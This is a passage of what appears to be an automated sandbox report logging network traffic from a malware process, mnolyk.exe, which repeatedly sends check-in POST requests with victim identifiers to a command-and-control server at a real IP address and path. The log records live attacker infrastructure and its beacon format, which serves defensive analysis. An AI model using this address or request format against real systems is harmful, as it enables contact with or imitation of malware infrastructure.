                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    362192.168.2.35006562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:05.449264050 CET562OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.513484001 CET562INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    363192.168.2.35006662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:05.694509029 CET563OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.756572008 CET563INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    364192.168.2.35006762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:05.932411909 CET564OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:05.995294094 CET564INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    365192.168.2.35006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:06.167681932 CET565OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:06.233010054 CET565INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    366192.168.2.35006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:06.449832916 CET566OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:06.514261007 CET566INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    367192.168.2.35007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:06.689347982 CET567OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:06.753258944 CET567INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    368192.168.2.35007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:06.945888042 CET568OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.008430958 CET568INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    369192.168.2.35007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:07.195107937 CET569OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.262188911 CET569INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    37192.168.2.34973962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:25.862579107 CET238OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.926588058 CET238INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    370192.168.2.35007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:07.436064959 CET570OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.504116058 CET570INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    371192.168.2.35007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:07.684649944 CET571OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.747404099 CET571INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    372192.168.2.35007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:07.920020103 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:07.983623028 CET572INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    373192.168.2.35007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:08.154937029 CET573OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.217927933 CET573INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    374192.168.2.35007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:08.402072906 CET574OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.466217995 CET574INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    375192.168.2.35007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:08.649501085 CET575OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.713500977 CET575INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    376192.168.2.35007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:08.887763977 CET576OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:08.950818062 CET576INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    377192.168.2.35008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:09.144078970 CET577OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.207382917 CET577INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    378192.168.2.35008162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:09.395226955 CET578OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.459316969 CET578INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    379192.168.2.35008262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:09.638220072 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:09.703239918 CET579INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    38192.168.2.34974062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:26.105437040 CET239OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
